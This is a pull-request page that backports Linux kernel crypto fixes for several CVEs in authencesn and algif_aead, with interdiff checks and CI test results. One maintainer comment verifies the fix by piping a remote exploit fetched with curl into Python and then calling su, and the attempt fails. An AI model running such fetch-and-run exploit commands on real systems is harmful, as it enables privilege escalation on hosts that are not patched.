 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -323,8 +311,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -342,10 +335,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -233,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -296,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit fa5a37719504 (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -224,7 +224,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -212,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

7 commit(s) with issues found:

Commit fa5a37719504

Summary: crypto: algif_aead - snapshot IV for async AEAD requests

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit dedddb7862c2

Summary: crypto: algif_aead - Fix minimum RX size check for decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 2da6a693e8f5

Summary: crypto: authencesn - reject short ahash digests during instance creation

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit f50e3313629b

Summary: crypto: authencesn - Fix src offset when decrypting in-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 18b86ddf564d

Summary: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit c476c6e98ec6

Summary: crypto: algif_aead - Revert to operating out-of-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 6f82c321961b

Summary: crypto: af-alg - fix NULL pointer dereference in scatterwalk

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25229315769

@PlaidCat

PlaidCat commented May 1, 2026

Copy link
Copy Markdown
Collaborator Author

CVE remediation is still valid

[jmaple@localhost lts-8.6]$ sudo dnf install python3.11
Last metadata expiration check: 1:44:09 ago on Fri 01 May 2026 06:24:33 PM UTC.
Package python3.11-3.11.13-7.el8_10.x86_64 is already installed.
Dependencies resolved.
Nothing to do.
Complete!
[jmaple@localhost lts-8.6]$ curl https://copy.fail/exp | python3.11 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   4656      0 --:--:-- --:--:-- --:--:--  4656
Password: su: Authentication failure
Password:
[jmaple@localhost lts-8.6]$ id
uid=1000(jmaple) gid=1000(jmaple) groups=1000(jmaple) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

@PlaidCat PlaidCat merged commit 2cd7aee into ciqlts8_6 May 1, 2026
4 of 5 checks passed
@PlaidCat PlaidCat deleted the {jmaple}_ciqlts8_6 branch May 1, 2026 20:12
@ciq-kernel-automation

Copy link
Copy Markdown

Summary

This PR has been automatically created after successful completion of all CI stages.

Commit Message(s)

crypto: af-alg - fix NULL pointer dereference in scatterwalk

jira VULN-181877
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b493e14107ae82d8b80938f293d95425bcb
commit-source centos-stream-9
crypto: algif_aead - Revert to operating out-of-place

jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
commit-source centos-stream-9
upstream-diff |
	Contextual changes required for the following
	crypto/af_alg.c due to missing commit b2a4411
	  ("crypto: doc - fix kernel-doc notation in chacha.c and af_alg.c"),
	crypto_alfig_aead.c in _aead_recvmsg due to missing 8d60539
	  ("crypto: null - Remove VLA usage of skcipher") that replaces
	  'struct crypto_skcipher' with 'struct crypto_sync_skcipher'
	include/crypto/if_alg.h that had different func declarations around
	  'af_alg_count_tsgl' and 'af_alg_pull_tsgl'
crypto: af_alg - limit RX SG extraction by receive buffer budget

jira VULN-182987
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab19eba9dcbfd2a0daec72e1bf48aa100170
commit-source centos-stream-9
crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

jira VULN-182987
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d00156e50ecad37f2cb6cbf04aaa9a260505ef
commit-source centos-stream-9
crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

jira VULN-175565
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e9264676be7794f8f7f1e9763d90bd3c7335
commit-source centos-stream-9
crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e02494114ebf7c8b42777c6cd6982f113bfdbec7
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.
crypto: authencesn - Fix src offset when decrypting in-place

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3b19a9dfc947868edda0bb8e48e5b5a8fa
commit-source centos-stream-9
crypto: authencesn - reject short ahash digests during instance creation

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.
crypto: algif_aead - Fix minimum RX size check for decryption

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd48e3a77091cbce637a12c2ae31b4a1687c
crypto: algif_aead - snapshot IV for async AEAD requests

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3a572b3e3b6c786953339f7978b845cc52

Test Results

✅ Build Stage

Architecture Build Time Total Time
x86_64 22m 17s 23m 12s
aarch64 9m 18s 9m 55s

✅ Boot Verification

✅ Kernel Selftests

Architecture Passed Failed Compared Against Status
x86_64 108 31 ciqlts8_6 ✅ No regressions
aarch64 66 21 ciqlts8_6 ✅ No regressions

✅ LTP Results

Architecture Passed Failed Compared Against Status
x86_64 1434 13 ciqlts8_6 ✅ No regressions
aarch64 1425 14 ciqlts8_6 ✅ No regressions

x86_64 newly passing:

  • fs_fill (FAIL -> PASS)

🤖 This PR was automatically generated by GitHub Actions
Run ID: 25228085236

@ciq-kernel-automation

Copy link
Copy Markdown

Summary

This PR has been automatically created after successful completion of all CI stages.

Commit Message(s)

crypto: af-alg - fix NULL pointer dereference in scatterwalk

jira VULN-181877
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b493e14107ae82d8b80938f293d95425bcb
commit-source centos-stream-9
crypto: algif_aead - Revert to operating out-of-place

jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
commit-source centos-stream-9
upstream-diff |
	Contextual changes required for the following
	crypto/af_alg.c due to missing commit b2a4411
	  ("crypto: doc - fix kernel-doc notation in chacha.c and af_alg.c"),
	crypto_alfig_aead.c in _aead_recvmsg due to missing 8d60539
	  ("crypto: null - Remove VLA usage of skcipher") that replaces
	  'struct crypto_skcipher' with 'struct crypto_sync_skcipher'
	include/crypto/if_alg.h that had different func declarations around
	  'af_alg_count_tsgl' and 'af_alg_pull_tsgl'
crypto: af_alg - limit RX SG extraction by receive buffer budget

jira VULN-182987
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab19eba9dcbfd2a0daec72e1bf48aa100170
commit-source centos-stream-9
crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

jira VULN-182987
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d00156e50ecad37f2cb6cbf04aaa9a260505ef
commit-source centos-stream-9
crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

jira VULN-175565
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e9264676be7794f8f7f1e9763d90bd3c7335
commit-source centos-stream-9
crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

jira VULN-181877
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e02494114ebf7c8b42777c6cd6982f113bfdbec7
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.
crypto: authencesn - Fix src offset when decrypting in-place

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3b19a9dfc947868edda0bb8e48e5b5a8fa
commit-source centos-stream-9
crypto: authencesn - reject short ahash digests during instance creation

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.
crypto: algif_aead - Fix minimum RX size check for decryption

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd48e3a77091cbce637a12c2ae31b4a1687c
crypto: algif_aead - snapshot IV for async AEAD requests

jira VULN-181877
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3a572b3e3b6c786953339f7978b845cc52

Test Results

✅ Build Stage

Architecture Build Time Total Time
x86_64 23m 35s 24m 27s
aarch64 9m 32s 10m 13s

✅ Boot Verification

✅ Kernel Selftests

Architecture Passed Failed Compared Against Status
x86_64 109 30 ciqlts8_6 ✅ No regressions
aarch64 66 21 ciqlts8_6 ✅ No regressions

✅ LTP Results

Architecture Passed Failed Compared Against Status
x86_64 1434 13 ciqlts8_6 ✅ No regressions
aarch64 1425 14 ciqlts8_6 ✅ No regressions

🤖 This PR was automatically generated by GitHub Actions
Run ID: 25228950555

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Development

Successfully merging this pull request may close these issues.

5 participants